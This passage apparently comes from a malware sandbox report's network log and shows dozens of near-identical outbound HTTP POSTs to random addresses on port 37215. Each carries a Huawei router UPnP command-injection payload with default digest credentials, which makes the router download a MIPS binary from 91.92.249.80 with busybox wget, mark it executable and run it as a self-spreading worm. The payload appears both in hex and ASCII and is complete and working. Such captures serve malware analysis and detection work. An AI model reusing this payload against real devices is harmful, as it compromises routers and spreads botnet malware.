[TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2011192.168.2.2335772157.133.182.6737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.594482899 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2012192.168.2.2357114169.216.45.24037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.594487906 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2013192.168.2.2357838197.223.250.8337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.594495058 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2014192.168.2.233685241.43.239.16637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.594571114 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2015192.168.2.233800241.189.15.18037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.594623089 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2016192.168.2.2357640157.72.176.24437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.594676971 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2017192.168.2.2346738157.233.195.6937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.594681025 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2018192.168.2.235851041.155.125.4437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.594712973 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2019192.168.2.2360672157.196.0.4337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.594784975 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2020192.168.2.235387441.165.130.22037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.594832897 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2021192.168.2.2357650197.42.13.24637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.594872952 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
